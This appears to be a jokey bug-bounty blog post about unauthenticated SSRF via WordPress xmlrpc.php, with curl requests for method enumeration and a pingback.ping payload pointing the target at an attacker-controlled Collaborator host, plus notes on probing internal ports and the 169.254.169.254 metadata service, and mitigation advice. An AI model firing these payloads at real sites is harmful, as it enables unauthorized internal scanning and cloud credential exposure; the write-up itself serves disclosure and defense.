Back to Articles

🛰️ So… I Made a Server Call Me Back. Unauthenticated SSRF via XML‑RPC

AIwolfie 3 min read

One fine evening, while sipping coffee stronger than my will to live, I accidentally made a server talk to me. Literally.

☕ The Setup: XML‑RPC aka WordPress's Forgotten Child

Ever stumble upon a file named xmlrpc.php and think, "Oh look, a rusty gate to the backend world"?

That's exactly what I thought. And like every other bored hacker with caffeine in their blood, I poked it using curl.

Request:

curl -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  --data '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>'

Response:

<methodResponse>
  <params>
    <param><value><string>Hello!</string></value></param>
  </params>
</methodResponse>

Server said hello. I said: "Nice to meet you, let's be friends… maliciously." 😈

🔍 Enumerating Methods Like a Nosy Neighbor

Naturally, I wanted to know what tricks this server had.

Request:

curl -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  --data '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>'

Response: A giant list of methods dropped like:

pingback.ping
metaWeblog.newPost
wp.uploadFile
blogger.deletePost
wp.getUsers
...

When you realize the server knows more methods than you do in Python.

🚨 The Vulnerability That Hit Different: pingback.ping

So what does pingback.ping do? Well, it lets the server make a request to another URL.

Imagine calling your friend to check if someone linked your blog — now imagine your friend is a vulnerable server that calls any URL you give it.

So I handed it a very harmless link (my Burp Collaborator domain).

Payload:

curl -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  --data '<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://attacker.burpcollaborator.net</string></value></param>
    <param><value><string>https://target.com/blog/hello-world</string></value></param>
  </params>
</methodCall>'

📡 And It Responded… Loudly

My Burp Collaborator popped off like:

  • ✅ DNS Lookup from one IP
  • ✅ HTTP request from another IP
  • ✅ Extra DNS queries from a third

Bro, the server was working harder than me on a Monday morning.

😱 Impact: Why You Shouldn't Trust Strangers

With this unauthenticated SSRF (Server‑Side Request Forgery), I could:

  • Port scan internal services like a nosy neighbor
  • Try to reach metadata services (http://169.254.169.254)
  • Abuse it to pivot further
  • Chain it with more vulnerabilities (like RCE, who knows!)

All without logging in. Just plain XML and desperation.

🔒 Recommendations (aka How to Make Your Server Less Friendly)

  • Disable pingback.ping unless you really need it
  • Block xmlrpc.php entirely if unused
  • Use allowlists on outbound HTTP requests
  • Monitor internal traffic like you monitor memes during work

☕ Final Thoughts

If your server still supports XML‑RPC in 2025, and especially pingback.ping, it's basically saying:

"I'm open to conversations… even with attackers."

Patch up. Audit your WordPress setups. And never underestimate old endpoints with long names.

Also: drink your coffee. The bugs won't find themselves.

— AIwolfie

Bug Bounty SSRF WordPress XML-RPC Security